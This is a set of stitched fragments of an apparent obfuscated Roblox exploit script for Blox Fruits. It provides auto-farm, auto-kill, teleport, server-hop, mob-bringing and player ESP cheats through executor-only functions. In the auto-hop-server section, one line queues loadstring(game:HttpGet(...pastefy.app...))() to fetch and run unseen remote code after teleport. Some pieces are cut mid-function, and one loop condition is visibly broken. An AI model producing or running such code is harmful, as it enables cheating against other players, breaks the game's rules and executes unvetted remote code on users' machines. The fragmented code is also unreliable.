	while wait(1) do
		local L_202_ = {}
		L_202_[1] = (game:GetService("ReplicatedStorage")):FindFirstChild("rip_indra True Form") or (game:GetService("Workspace"))["Enemies"]:FindFirstChild("rip_indra") and "âœ…ï¸" or "âŒï¸"
		if L_202_[1] ~= L_201_[2] then
			CheckRip:SetDesc("Status: " .. L_202_[1])
			L_201_[2] = L_202_[1]
		end
	end
end)
CheckDoughKing = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Dough King";
	["Content"] = "Status: "
})
spawn(function()
	local L_203_ = {}
	L_203_[1] = ""
	while wait(1) do
		local L_204_ = {}
		L_204_[2] = (game:GetService("ReplicatedStorage")):FindFirstChild("Dough King") or (game:GetService("Workspace"))["Enemies"]:FindFirstChild("Dough King") and "âœ…ï¸" or "âŒï¸"
		if L_204_[2] ~= L_203_[1] then
			CheckDoughKing:SetDesc("Status: " .. L_204_[2])
			L_203_[1] = L_204_[2]
		end
	end
end)
EliteHunter = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Elite Hunter";
	["Content"] = "Status: "
})
spawn(function()
	local L_205_ = {}
	L_205_[1] = ""
	while wait(1) do
		local L_206_ = {}
		L_206_[3] = ((game:GetService("ReplicatedStorage")):FindFirstChild("Diablo") or (game:GetService("ReplicatedStorage")):FindFirstChild("Deandre") or (game:GetService("ReplicatedStorage")):FindFirstChild("Urban") or (game:GetService("Workspace"))["Enemies"]:FindFirstChild("Diablo") or (game:GetService("Workspace"))["Enemies"]:FindFirstChild("Deandre") or (game:GetService("Workspace"))["Enemies"]:FindFirstChild("Urban")) and "âœ…ï¸" or "âŒï¸"
		L_206_[1] = (game:GetService("ReplicatedStorage"))["Remotes"]["CommF_"]:InvokeServer("EliteHunter", "Progress")
		if L_206_[3] ~= L_205_[1] then
			EliteHunter:SetDesc("Status: " .. (L_206_[3] .. (" | Killed: " .. L_206_[1])))
			L_205_[1] = L_206_[3]
		end
	end
end)
FM = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Full Moon",
	["Content"] = ""
})
		_G["MasterAutoCandy"] = L_277_[1]
		if not L_277_[1] then
			_G["AutoFarmCandy"] = false
			_G["AutoTPAndCollect"] = false
			_G["EntranceDone"] = false
			_G["IsProcessingRemote"] = false
			L_1_[84] = false
			L_1_[40] = false
			pcall(function()
				L_1_[18]["Remotes"]["CommF_"]:InvokeServer("AbandonQuest")
			end)
		end
	end
})
task["spawn"](function()
	local L_278_ = {}
	L_278_[2] = false
	while task["wait"](.5) do
		if _G["MasterAutoCandy"] then
			local L_279_ = {}
			L_279_[2] = L_1_[139]()
			L_279_[5] = _G["GiftWarnTime"] or 300
			L_279_[1] = workspace:FindFirstChild("_WorldOrigin")
			L_279_[4] = L_279_[1] and (L_279_[1]:FindFirstChild("Present") and L_279_[1]["Present"]:FindFirstChild("Box"))
			if L_279_[4] or L_279_[2] <= L_279_[5] then
				if _G["AutoFarmCandy"] then
					_G["AutoFarmCandy"] = false
				end
				_G["AutoTPAndCollect"] = true
				if not _G["EntranceDone"] and not _G["IsProcessingRemote"] then
					_G["IsProcessingRemote"] = true
					task["spawn"](function()
						pcall(function()
							L_1_[125]()
						end)
						task["wait"](1)
						_G["EntranceDone"] = true
						_G["IsProcessingRemote"] = false
					end)
				end
				if _G["EntranceDone"] then
					pcall(function()
						if L_279_[4] then
							local L_280_ = {}
							L_278_[2] = false
							_tp(L_279_[4]["CFrame"] * CFrame["new"](0, 3, 0))
							L_280_[1] = L_279_[4]:FindFirstChildWhichIsA("ProximityPrompt", true)
							if L_280_[1] then
								fireproximityprompt(L_280_[1])
							end
							keypress(Enum["KeyCode"]["E"])
							task["wait"](.1)
							keyrelease(Enum["KeyCode"]["E"])
						elseif _G["SelectedGiftMap"] and (GiftMaps[_G["SelectedGiftMap"]] and not L_278_[2]) then
							_tp(GiftMaps[_G["SelectedGiftMap"]]["CF"])
							L_278_[2] = true
						end
					end)
				end
			else
				_G["AutoTPAndCollect"] = false
				_G["EntranceDone"] = false
				_G["IsProcessingRemote"] = false
				L_278_[2] = false
				if not _G["AutoFarmCandy"] then
					_G["AutoFarmCandy"] = true
				end
			end
		end
	end
end)
			local L_400_ = {}
			L_400_[1] = L_399_arg0;
			(getgenv())["SelectMob"] = L_400_[1]
		end
	})
end
if World2 then
	L_1_[93]["Main"]:AddDropdown({
		["Name"] = "Select Mob";
		["Default"] = false;
		["Options"] = {
			"Raider";
			"Mercenary";
			"Swan Pirate";
			"Factory Staff",
			"Marine Lieutenant",
			"Marine Captain",
			"Zombie";
			"Vampire";
			"Snow Trooper",
			"Winter Warrior";
			"Lab Subordinate";
			"Horned Warrior",
			"Magma Ninja",
			"Lava Pirate";
			"Ship Deckhand";
			"Ship Engineer";
			"Ship Steward";
			"Ship Officer";
			"Arctic Warrior";
			"Snow Lurker";
			"Sea Soldier";
			"Water Fighter"
		};
		["Callback"] = function(L_401_arg0)
			local L_402_ = {}
			L_402_[2] = L_401_arg0;
			(getgenv())["SelectMob"] = L_402_[2]
		end
	})
end
if World3 then
	L_1_[93]["Main"]:AddDropdown({
		["Name"] = "Select Mob",
		["Default"] = false,
		["Options"] = {
			"Pirate Millionaire";
			"Dragon Crew Warrior",
			"Dragon Crew Archer";
			"Female Islander",
			"Giant Islander";
			"Marine Commodore";
			"Marine Rear Admiral",
			"Fishman Raider",
			"Fishman Captain",
			"Forest Pirate",
			"Mythological Pirate",
			"Jungle Pirate",
			"Musketeer Pirate";
			"Reborn Skeleton",
			"Living Zombie",
			"Demonic Soul";
			"Posessed Mummy";
			"Peanut Scout";
			"Peanut President",
			"Ice Cream Chef",
			"Ice Cream Commander";
			"Cookie Crafter";
			"Cake Guard";
			"Baking Staff";
			"Head Baker";
			"Cocoa Warrior",
			L_1_[2]({
				"Chocolate Bar Battle";
				"r"
			}),
			"Sweet Thief",
			"Candy Rebel",
			"Candy Pirate",
			"Snow Demon",
			"Isle Outlaw",
			"Island Boy",
			"Sun-kissed Warrior",
			"Isle Champion"
		};
		["Callback"] = function(L_403_arg0)
			local L_404_ = {}
			L_404_[1] = L_403_arg0;
			(getgenv())["SelectMob"] = L_404_[1]
		end
	})
end
L_1_[93]["Main"]:AddToggle({
	["Name"] = "Auto Kill Mob";
	["Default"] = false,
	["Callback"] = function(L_405_arg0)
		local L_406_ = {}
		L_406_[2] = L_405_arg0
		_G["AutoKillMob"] = L_406_[2]
	end
})
spawn(function()
	while wait() do
		if _G["AutoKillMob"] then
			pcall(function()
				if (game:GetService("Workspace"))["Enemies"]:FindFirstChild((getgenv())["SelectMob"]) then
					for L_407_forvar0, L_408_forvar1 in pairs((game:GetService("Workspace"))["Enemies"]:GetChildren()) do
						local L_409_ = {}
						L_409_[3], L_409_[1] = L_407_forvar0, L_408_forvar1
						if L_409_[1]["Name"] == (getgenv())["SelectMob"] then
							if L_409_[1]:FindFirstChild("Humanoid") and (L_409_[1]:FindFirstChild("HumanoidRootPart") and L_409_[1]["Humanoid"]["Health"] > 0) then
								repeat
									(game:GetService("RunService"))["Heartbeat"]:Wait()
									L_1_[4]["Kill"](L_409_[1], _G["AutoKillMob"])
								until not _G["AutoKillMob"] or not L_409_[1]["Parent"] or L_409_[1]["Humanoid"]["Health"] <= 0
							end
						end
					end
				end
			end)
		end
	end
end)
["Humanoid"]["Health"] <= 0
					else
						_tp(CFrame["new"](402.71890258789, 81.060501098633, -12259.54296875))
					end
				end
			end)
		end
	end
end)
L_1_[93]["Main"]:AddToggle({
	["Name"] = "Auto Farm Dough King",
	["Default"] = false;
	["Callback"] = function(L_495_arg0)
		local L_496_ = {}
		L_496_[2] = L_495_arg0
		_G["AutoAttackDoughKing"] = L_496_[2]
	end
})
spawn(function()
	while wait() do
		if _G["AutoAttackDoughKing"] then
			pcall(function()
				local L_497_ = {}
				L_497_[1] = GetConnectionEnemies("Dough King")
				if L_497_[1] then
					repeat
						task["wait"]()
						L_1_[4]["Kill"](L_497_[1], _G["AutoAttackDoughKing"])
					until not _G["AutoAttackDoughKing"] or not L_497_[1]["Parent"] or L_497_[1]["Humanoid"]["Health"] <= 0
				else
					_tp(CFrame["new"](-1943.6765, 251.5095, -12337.8809))
				end
			end)
		end
	end
end)
L_1_[93]["Main"]:AddToggle({
	["Name"] = L_1_[2]({
		"Auto Farm Dough King";
		" + Hop"
	}),
	["Default"] = false,
	["Callback"] = function(L_498_arg0)
		local L_499_ = {}
		L_499_[2] = L_498_arg0
		_G["AutoHop_Dough"] = L_499_[2]
	end
})
L_1_[116] = function()
	pcall(function()
		local L_500_ = {}
		L_500_[3] = game:GetService("HttpService")
		L_500_[1] = {}
		L_500_[2] = game:HttpGet(L_1_[2]({
			"https://games.roblox",
			".com/v1/games/"
		}) .. (game["PlaceId"] .. L_1_[2]({
			"/servers/Public?sort";
			"Order=Asc&limit=100"
		})))
		L_500_[5] = L_500_[3]:JSONDecode(L_500_[2])
		for L_501_forvar0, L_502_forvar1 in pairs(L_500_[5]["data"]) do
			local L_503_ = {}
			L_503_[2], L_503_[3] = L_501_forvar0, L_502_forvar1
			if L_503_[3]["playing"] < L_503_[3]["maxPlayers"] then
				table["insert"](L_500_[1], L_503_[3]["id"])
			end
		end
		if #L_500_[1] > 0 then
			(game:GetService("TeleportService")):TeleportToPlaceInstance(game["PlaceId"], L_500_[1][math["random"](1, #L_500_[1])], game["Players"]["LocalPlayer"])
		end
	end)
end
spawn(function()
	while task["wait"]() do
		if _G["AutoHop_Dough"] then
			pcall(function()
				local L_504_ = {}
				L_504_[2] = GetConnectionEnemies("Dough King")
				if L_504_[2] then
					repeat
						task["wait"]()
						L_1_[4]["Kill"](L_504_[2], _G["AutoHop_Dough"])
					until not _G["AutoHop_Dough"] or not L_504_[2]["Parent"] or L_504_[2]["Humanoid"]["Health"] <= 0
				else
					local L_505_ = {}
					_tp(CFrame["new"](-1943.6765, 251.5095, -12337.8809))
					task["wait"](2)
					L_505_[1] = GetConnectionEnemies("Dough King")
					if not L_505_[1] and _G["AutoHop_Dough"] then
						L_1_[116]()
					end
				end
			end)
		end
	end
end)
L_1_[93]["Main"]:AddSection({
	"Unlocked Dungeon"
})
DouD = L_1_[93]["Main"]:AddToggle({
	["Name"] = L_1_[2]({
		"Auto Unlock Dough du";
		"ngeon"
	}),
	["Description"] = "";
	["Default"] = false;
	["Callback"] = function(L_506_arg0)
		local L_507_ = {}
		L_507_[1] = L_506_arg0
		_G["Doughv2"] = L_507_[1]
	end
})
spawn(function()
	while wait(Sec) do
		if _G["Doughv2"] then
			pcall(function()
				if not workspace["Map"]["CakeLoaf"]:FindFirstChild("RedDoor") then
					if GetBP("Red Key") then
						L_1_[18]["Remotes"]["CommF_"]:InvokeServer("CakeScientist", "Check")
						L_1_[18]["Remotes"]["CommF_"]:InvokeServer("RaidsNpc", "Check")
					end
				elseif workspace["Map"]["CakeLoaf"]:FindFirstChild("RedDoor") then
					if GetBP("Red Key") then
						repeat
							wait()
							_tp(CFrame["new"](-2681.97998, 64.3921585, -12853.7363, .149007782, -1.87902192e-08, .98883605, 3.60619588e-08, 1, 1.35681812e-08, -0.98883605, 3.36376011e-08, .149007782))
						until not _G["Doughv2"] or (L_1_[136]["Character"]["HumanoidRootPart"]["CFrame"] - CFrame["new"](-2681.97998, 64.3921585, -12853.7363, .149007782, -1.87902192e-08, .98883605, 3.60619588e-08, 1, 1.35681812e-08, -0.98883605, 3.36376011e-08, .149007782))["Magnitude"] <= 5
						EquipWeapon("Red Key")
					end
				elseif GetConnectionEnemies("Dough King") then
					local L_508_ = {}
					L_508_[2] = GetConnectionEnemies("Dough King")
					if L_508_[2] then
						repeat
							wait()
							L_1_[4]["Kill"](L_508_[2], _G["Doughv2"])
						until not _G["Doughv2"] or not L_508_[2]["Parent"] or L_508_[2]["Humanoid"]["Health"] <= 0
					else
						_tp(CFrame["new"](-1943.6765136719, 251.50956726074, -12337.880859375))
					end
				end
				if GetBP("Sweet Chalice") then
					L_1_[18]["Remotes"]["CommF_"]:InvokeServer("CakePrinceSpawner", true)
					_G["AutoMiror"] = true
				else
					_G["AutoMiror"] = false
				end
				if GetBP("God's Chalice") and GetM("Conjured Cocoa") >= 10 then
					L_1_[18]["Remotes"]["CommF_"]:InvokeServer("SweetChaliceNpc")
				end
				if not L_1_[136]["Backpack"]:FindFirstChild("God's Chalice") or L_1_[136]["Character"]:FindFirstChild("God's Chalice") then
					_G["FarmEliteHunt"] = true
				else
					_G["FarmEliteHunt"] = false
				end
				if GetM("Conjured Cocoa") <= 10 then
					local L_509_ = {}
					L_509_[2] = {
						"Cocoa Warrior";
						L_1_[2]({
							"Chocolate Bar Battle";
							"r"
						})
					}
					L_509_[3] = GetConnectionEnemies(L_509_[2])
					if L_509_[3] then
						repeat
							wait()
							L_1_[4]["Kill"](L_509_[3], _G["Doughv2"])
						until _G["Doughv2"] == false or not L_509_[3]["Parent"] or L_509_[3]["Humanoid"]["Health"] <= 0
					else
						_tp(CFrame["new"](402.71890258789, 81.060501098633, -12259.54296875))
					end
				end
			end)
		end
	end
end)
							if L_623_[2]["Type"] == "Sword" then
								SwordName = L_623_[2]["Name"]
								if tonumber(L_623_[2]["Mastery"]) >= 1 or tonumber(L_623_[2]["Mastery"]) <= 599 then
									local L_624_ = {}
									L_624_[2] = GetConnectionEnemies(L_1_[122])
									if GetBP(SwordName) then
										if L_624_[2] then
											repeat
												wait()
												L_1_[4]["Sword"](L_624_[2], _G["FarmMastery_S"])
											until _G["FarmMastery_S"] == false or not L_624_[2]["Parent"] or L_624_[2]["Humanoid"]["Health"] <= 0
										else
											_tp(CFrame["new"](-1943.6765136719, 251.50956726074, -12337.880859375))
										end
									else
										L_1_[18]["Remotes"]["CommF_"]:InvokeServer("LoadItem", SwordName)
									end
								elseif tonumber(L_623_[2]["Mastery"]) >= 600 then
									if GetBP(SwordName) then
										return nil
									else
										L_1_[18]["Remotes"]["CommF_"]:InvokeServer("LoadItem", SwordName)
									end
								end
								break
							end
						end
					end
				elseif SelectIsland == "Bone" then
					for L_625_forvar0, L_626_forvar1 in next, L_1_[18]["Remotes"]["CommF_"]:InvokeServer("getInventory") do
						local L_627_ = {}
						L_627_[2], L_627_[1] = L_625_forvar0, L_626_forvar1
						if type(L_627_[1]) == "table" then
							if L_627_[1]["Type"] == "Sword" then
								SwordName = L_627_[1]["Name"]
								if tonumber(L_627_[1]["Mastery"]) >= 1 or tonumber(L_627_[1]["Mastery"]) <= 599 then
									local L_628_ = {}
									L_628_[2] = GetConnectionEnemies(L_1_[95])
									if GetBP(SwordName) then
										if L_628_[2] then
											repeat
												wait()
												L_1_[4]["Sword"](L_628_[2], _G["FarmMastery_S"])
											until _G["FarmMastery_S"] == false or not L_628_[2]["Parent"] or L_628_[2]["Humanoid"]["Health"] <= 0
										else
											_tp(CFrame["new"](-9495.6806640625, 453.58624267578, 5977.3486328125))
										end
									else
										L_1_[18]["Remotes"]["CommF_"]:InvokeServer("LoadItem", SwordName)
									end
								elseif tonumber(L_627_[1]["Mastery"]) >= 600 then
									if GetBP(SwordName) then
										return nil
									else
										L_1_[18]["Remotes"]["CommF_"]:InvokeServer("LoadItem", SwordName)
									end
								end
								break
							end
						end
					end
				end
			end
		end)
	end
end)
L_1_[93]["Settings"]:AddSection({
	"Settings / Configure"
})
Initialize = L_1_[93]["Settings"]:AddToggle({
	["Name"] = "Fast Attack",
	["Description"] = "",
	["Default"] = true,
	["Callback"] = function(L_629_arg0)
		local L_630_ = {}
		L_630_[2] = L_629_arg0
		_G["Seriality"] = L_630_[2]
	end
})
Bringmob = L_1_[93]["Settings"]:AddToggle({
	["Name"] = "Bring Mobs";
	["Description"] = "",
	["Default"] = true,
	["Callback"] = function(L_631_arg0)
		local L_632_ = {}
		L_632_[2] = L_631_arg0
		_B = L_632_[2]
	end
})
L_1_[93]["Settings"]:AddDropdown({
	["Name"] = "Bring Mob Mode";
	["Description"] = "Adjust Range";
	["Default"] = "350";
	["Options"] = {
		"250";
		"300";
		"350",
		"400";
		"450";
		"500"
	},
	["Callback"] = function(L_633_arg0)
		local L_634_ = {}
		L_634_[2] = L_633_arg0
		_G["BringRange"] = tonumber(L_634_[2])
	end
})
L_1_[93]["Settings"]:AddDropdown({
	["Name"] = "Bring Mob Speed";
	["Description"] = "Adjust Speed";
	["Default"] = "300";
	["Options"] = {
		"250";
		"300",
		"350";
		"400";
		"450";
		"500"
	},
	["Callback"] = function(L_635_arg0)
		local L_636_ = {}
		L_636_[2] = L_635_arg0
		_G["SpeedB"] = tonumber(L_636_[2])
	end
})
L_1_[93]["Settings"]:AddDropdown({
	["Name"] = "Bring Mob Max",
	["Description"] = "Adjust Mob";
	["Default"] = "6",
	["Options"] = {
		"2";
		"3";
		"4";
		"5";
		"6"
	};
	["Callback"] = function(L_637_arg0)
		local L_638_ = {}
		L_638_[1] = L_637_arg0
		_G["MobM"] = tonumber(L_638_[1])
	end
})
L_1_[93]["Settings"]:AddToggle({
	["Name"] = "Auto Hop Server",
	["Default"] = false;
	["Callback"] = function(L_639_arg0)
		local L_640_ = {}
		L_640_[2] = L_639_arg0
		_G["AutoHopServer"] = L_640_[2]
		if not L_640_[2] then
			_G["HopTimer"] = nil
		end
	end
})
Spawn(function()
	while Wait(1) do
		if _G["AutoHopServer"] then
			pcall(function()
				if not _G["HopTimer"] then
					_G["HopTimer"] = tick()
				end
				if tick() - _G["HopTimer"] >= _G["HopDelay"] then
					_G["HopTimer"] = tick()
					if syn and syn["queue_on_teleport"] then
						syn["queue_on_teleport"](L_1_[2]({
							"loadstring(game:Http",
							"Get('https://pastefy",
							".app/iiFOhcot/raw'))",
							"()"
						}))
					end;
					(game:GetService("TeleportService")):Teleport(game["PlaceId"], game["Players"]["LocalPlayer"])
				end
			end)
		end
	end
end)
											for L_828_forvar0, L_829_forvar1 in pairs(workspace["Map"]["HeavenlyDimension"]:GetDescendants()) do
												local L_830_ = {}
												L_830_[1], L_830_[2] = L_828_forvar0, L_829_forvar1
												if L_830_[2]:IsA("ProximityPrompt") then
													fireproximityprompt(L_830_[2])
												end
											end
										until ((CFrame["new"](-22529.6171875, 5275.7739257812, 3873.5712890625))["Position"] - game["Players"]["LocalPlayer"]["Character"]["HumanoidRootPart"]["Position"])["Magnitude"] < 5
										wait(2)
										_G["DoneT1"] = true
									until not _G["CDK_TS"] or _G["DoneT1"]
									repeat
										wait()
										repeat
											wait()
											_tp(CFrame["new"](-22637.291015625, 5281.365234375, 3749.2885742188))
											for L_831_forvar0, L_832_forvar1 in pairs(workspace["Map"]["HeavenlyDimension"]:GetDescendants()) do
												local L_833_ = {}
												L_833_[2], L_833_[1] = L_831_forvar0, L_832_forvar1
												if L_833_[1]:IsA("ProximityPrompt") then
													fireproximityprompt(L_833_[1])
												end
											end
										until ((CFrame["new"](-22637.291015625, 5281.365234375, 3749.2885742188))["Position"] - game["Players"]["LocalPlayer"]["Character"]["HumanoidRootPart"]["Position"])["Magnitude"] < 5
										wait(2)
										_G["DoneT2"] = true
									until _G["DoneT2"] or _G["CDK_TS"] == false
									repeat
										wait()
										repeat
											task["wait"]()
											_tp(CFrame["new"](-22791.14453125, 5277.1655273438, 3764.5700683594))
											for L_834_forvar0, L_835_forvar1 in pairs(workspace["Map"]["HeavenlyDimension"]:GetDescendants()) do
												local L_836_ = {}
												L_836_[2], L_836_[3] = L_834_forvar0, L_835_forvar1
												if L_836_[3]:IsA("ProximityPrompt") then
													fireproximityprompt(L_836_[3])
												end
											end
										until ((CFrame["new"](-22791.14453125, 5277.1655273438, 3764.5700683594))["Position"] - game["Players"]["LocalPlayer"]["Character"]["HumanoidRootPart"]["Position"])["Magnitude"] < 5
										wait(2)
										_G["DoneT3"] = true
									until _G["DoneT3"] or _G["CDK_TS"] == false
									for L_837_forvar0, L_838_forvar1 in pairs(workspace["Enemies"]:GetChildren()) do
										local L_839_ = {}
										L_839_[2], L_839_[1] = L_837_forvar0, L_838_forvar1
										if ((L_839_[1]:FindFirstChild("HumanoidRootPart"))["Position"] - (CFrame["new"](-22695.7012, 5270.93652, 3814.42847, .11794927, 3.32185834e-08, .99301964, -8.73070718e-08, 1, -2.30819008e-08, -0.99301964, -8.3975138e-08, .11794927))["Position"])["Magnitude"] <= 300 then
											if L_839_[1]:FindFirstChild("HumanoidRootPart") and (L_839_[1]:FindFirstChild("Humanoid") and (L_839_[1]:FindFirstChild("Humanoid"))["Health"] > 0) then
												repeat
													wait()
													L_1_[4]["Kill"](L_839_[1], _G["CDK_TS"])
												until not _G["CDK_TS"] or L_839_[1]["Humanoid"]["Health"] <= 0 or not L_839_[1]["Parent"]
											end
										end
									end
								end
							end
						end
					end
				end
			end
		end)
	end
end)
	["Default"] = false;
	["Callback"] = function(L_999_arg0)
		local L_1000_ = {}
		L_1000_[2] = L_999_arg0
		_G["Auto_God_Human"] = L_1000_[2]
	end
})
spawn(function()
	while wait() do
		pcall(function()
			if _G["Auto_God_Human"] then
				if L_1_[18]["Remotes"]["CommF_"]:InvokeServer("BuyGodhuman", true) == L_1_[2]({
					"Bring me 20 Fish Tai";
					"ls, 20 Magma Ore, 10",
					" Dragon Scales and 1",
					"0 Mystic Droplets."
				}) then
					if GetM("Dragon Scale") == false or GetM("Dragon Scale") < 10 then
						if World3 then
							Lv = 1575
							_G["Level"] = true
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelZou")
						end
					elseif GetM("Fish Tail") == false or GetM("Fish Tail") < 20 then
						if World3 then
							Lv = 1775
							_G["Level"] = true
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelZou")
						end
					elseif GetM("Mystic Droplet") == false or GetM("Mystic Droplet") < 10 then
						if World2 then
							Lv = 1425
							_G["Level"] = true
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelDressrosa")
						end
					elseif GetM("Magma Ore") == false or GetM("Magma Ore") < 20 then
						if World2 then
							Lv = 1175
							_G["Level"] = true
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelDressrosa")
						end
					end
				elseif L_1_[18]["Remotes"]["CommF_"]:InvokeServer("BuyGodhuman", true) == 3 then
					return nil
				else
					L_1_[18]["Remotes"]["CommF_"]:InvokeServer("BuyGodhuman")
				end
			end
		end)
	end
end)
SanguineArt = L_1_[93]["Quests"]:AddToggle({
	["Name"] = "Auto SanguineArt",
	["Description"] = "",
	["Default"] = false,
	["Callback"] = function(L_1001_arg0)
		local L_1002_ = {}
		L_1002_[1] = L_1001_arg0
		_G["Snaguine"] = L_1002_[1]
	end
})
spawn(function()
	while wait(Sec) do
		if _G["Snaguine"] then
			pcall(function()
				if not GetBP("Sanguine Art") then
					L_1_[18]["Remotes"]["CommF_"]:InvokeServer("Sanguine Art")
				end
				if not GetBP("Sanguine Art") then
					if GetM("Leviathan Heart") >= 1 then
						print("Completed!!")
					else
						if World3 then
							_G["DangerSc"] = "Lv Infinite"
							_G["SailBoats"] = true
						else
							_G["SailBoats"] = false
						end
					end
					if GetM("Vampire Fang") <= 19 then
						if World2 then
							local L_1003_ = {}
							L_1003_[1] = GetConnectionEnemies("Vampire")
							if L_1003_[1] then
								repeat
									task["wait"]()
									L_1_[4]["Kill"](L_1003_[1], _G["Snaguine"])
								until not _G["Snaguine"] or L_1003_[1]["Humanoid"]["Health"] <= 0 or not L_1003_[1]["Parent"]
							else
								_tp(CFrame["new"](-6041.2924804688, 6.4027109146118, -1304.6333007812))
							end
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelDressrosa")
						end
					end
					if GetM("Vampire Fang") >= 20 and GetM("Demonic Wisp") <= 19 then
						if World3 then
							local L_1004_ = {}
							L_1004_[1] = GetConnectionEnemies("Demonic Soul")
							if L_1004_[1] then
								repeat
									task["wait"]()
									L_1_[4]["Kill"](L_1004_[1], _G["Snaguine"])
								until not _G["Snaguine"] or L_1004_[1]["Humanoid"]["Health"] <= 0 or not L_1004_[1]["Parent"]
							else
								_tp(CFrame["new"](-9495.6806640625, 453.58624267578, 5977.3486328125))
							end
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelZou")
						end
					end
					if GetM("Vampire Fang") >= 20 and (GetM("Demonic Wisp") >= 20 and GetM("Dark Fragment") <= 1) then
						if World2 then
							local L_1005_ = {}
							L_1005_[2] = GetConnectionEnemies("Darkbeard")
							if L_1005_[2] then
								repeat
									task["wait"]()
									L_1_[4]["Kill"](black, _G["Snaguine"])
								until _G["Snaguine"] or black["Humanoid"]["Health"] <= 0 or not black["Parent"]
							else
								_tp(CFrame["new"](3798.4575195313, 13.826690673828, -3399.806640625))
							end
						else
							L_1_[18]["Remotes"]["CommF_"]:InvokeServer("TravelDressrosa")
						end
					end
				else
					L_1_[18]["Remotes"]["CommF_"]:InvokeServer("BuySanguineArt")
				end
			end)
		end
	end
end)
	["Callback"] = function(L_1386_arg0)
		local L_1387_ = {}
		L_1387_[1] = L_1386_arg0
		BerryEsp = L_1387_[1]
		if not L_1387_[1] then
			for L_1388_forvar0, L_1389_forvar1 in ipairs(workspace:GetChildren()) do
				local L_1390_ = {}
				L_1390_[2], L_1390_[3] = L_1388_forvar0, L_1389_forvar1
				if L_1390_[3]:IsA("Part") and L_1390_[3]["Name"]:match("BerryEspPart_.*") then
					L_1390_[3]:Destroy()
				end
			end
		else
			task["spawn"](function()
				while BerryEsp do
					berriesEsp()
					task["wait"]()
				end
			end)
		end
	end
})
L_1_[93]["Esp"]:AddToggle({
	["Name"] = "Esp Player",
	["Description"] = "",
	["Default"] = false,
	["Callback"] = function(L_1391_arg0)
		local L_1392_ = {}
		L_1392_[1] = L_1391_arg0
		PlayerEsp = L_1392_[1]
		if not L_1392_[1] then
			for L_1393_forvar0, L_1394_forvar1 in next, game["Players"]:GetChildren() do
				local L_1395_ = {}
				L_1395_[1], L_1395_[2] = L_1393_forvar0, L_1394_forvar1
				pcall(function()
					if not isnil(L_1395_[2]["Character"]) and not isnil(L_1395_[2]["Character"]["Head"]) then
						if L_1395_[2]["Character"]["Head"]:FindFirstChild("NameEsp" .. Number) then
							(L_1395_[2]["Character"]["Head"]:FindFirstChild("NameEsp" .. Number)):Destroy()
						end
					end
				end)
			end
		else
			task["spawn"](function()
				while PlayerEsp do
					EspPly()
					task["wait"]()
				end
			end)
		end
	end
})
L_1_[93]["Misc"]:AddButton({
	["Name"] = "Remove Sky Fog";
	["Description"] = "",
	["Callback"] = function()
		if Lighting:FindFirstChild("LightingLayers") then
			Lighting["LightingLayers"]:Destroy()
		end
		if Lighting:FindFirstChild("SeaTerrorCC") then
			Lighting["SeaTerrorCC"]:Destroy()
		end
		if Lighting:FindFirstChild("FantasySky") then
			Lighting["FantasySky"]:Destroy()
		end
	end
})
L_1_[93]["Misc"]:AddSection({
	"Configure - God"
})
L_1_[93]["Misc"]:AddButton({
	["Name"] = "Rain Fruits (Client)",
	["Description"] = "",
	["Callback"] = function()
		for L_1715_forvar0, L_1716_forvar1 in pairs((game:GetObjects(L_1_[2]({
			"rbxassetid://1475936",
			"8201"
		})))[1]:GetChildren()) do
			local L_1717_ = {}
			L_1717_[2], L_1717_[3] = L_1715_forvar0, L_1716_forvar1
			L_1717_[3]["Parent"] = game["Workspace"]["Map"]
			L_1717_[3]:MoveTo(L_1_[42]["Character"]["PrimaryPart"]["Position"] + Vector3["new"](math["random"](-50, 50), 100, math["random"](-50, 50)))
			if L_1717_[3]["Fruit"]:FindFirstChild("AnimationController") then
				((L_1717_[3]["Fruit"]:FindFirstChild("AnimationController")):LoadAnimation(L_1717_[3]["Fruit"]:FindFirstChild("Idle"))):Play()
			end
			L_1717_[3]["Handle"]["Touched"]:Connect(function(L_1718_arg0)
				local L_1719_ = {}
				L_1719_[1] = L_1718_arg0
				if L_1719_[1]["Parent"] == L_1_[42]["Character"] then
					L_1717_[3]["Parent"] = L_1_[42]["Backpack"]
					L_1_[42]["Character"]["Humanoid"]:EquipTool(L_1717_[3])
				end
			end)
		end
	end
})
briggt1 = L_1_[93]["Misc"]:AddToggle({
	["Name"] = "Turn on Full Bright";
	["Description"] = "",
	["Default"] = false;
	["Callback"] = function(L_1720_arg0)
		local L_1721_ = {}
		L_1721_[1] = L_1720_arg0
		bright = L_1721_[1]
		if L_1721_[1] == true then
			Lighting["Ambient"] = Color3["new"](1, 1, 1)
			Lighting["ColorShift_Bottom"] = Color3["new"](1, 1, 1)
			Lighting["ColorShift_Top"] = Color3["new"](1, 1, 1)
		else
			Lighting["Ambient"] = Color3["new"](0, 0, 0)
			Lighting["ColorShift_Bottom"] = Color3["new"](0, 0, 0)
			Lighting["ColorShift_Top"] = Color3["new"](0, 0, 0)
		end
	end
})
DayN = L_1_[93]["Misc"]:AddDropdown({
	["Name"] = "Select Time";
	["Description"] = "";
	["Options"] = {
		"Day",
		"Night"
	};
	["Default"] = false,
	["Callback"] = function(L_1722_arg0)
		local L_1723_ = {}
		L_1723_[2] = L_1722_arg0
		_G["SelectDN"] = L_1723_[2]
	end
})
dayornight = L_1_[93]["Misc"]:AddToggle({
	["Name"] = "Turn on Time";
	["Description"] = "";
	["Default"] = false,
	["Callback"] = function(L_1724_arg0)
		local L_1725_ = {}
		L_1725_[2] = L_1724_arg0
		_G["daylightN"] = L_1725_[2]
	end
})
task["spawn"](function()
	while task["wait"]() do
		if _G["daylightN"] then
			if _G["SelectDN"] == "Day" then
				Lighting["ClockTime"] = 12
			elseif _G["SelectDN"] == "Night" then
				Lighting["ClockTime"] = 0
			end
		end
	end
end)
walkWater = L_1_[93]["Misc"]:AddToggle({
	["Name"] = L_1_[2]({
		"Turn on Walk on Wate";
		"r"
	});
	["Description"] = "",
	["Default"] = true,
	["Callback"] = function(L_1726_arg0)
		local L_1727_ = {}
		L_1727_[1] = L_1726_arg0
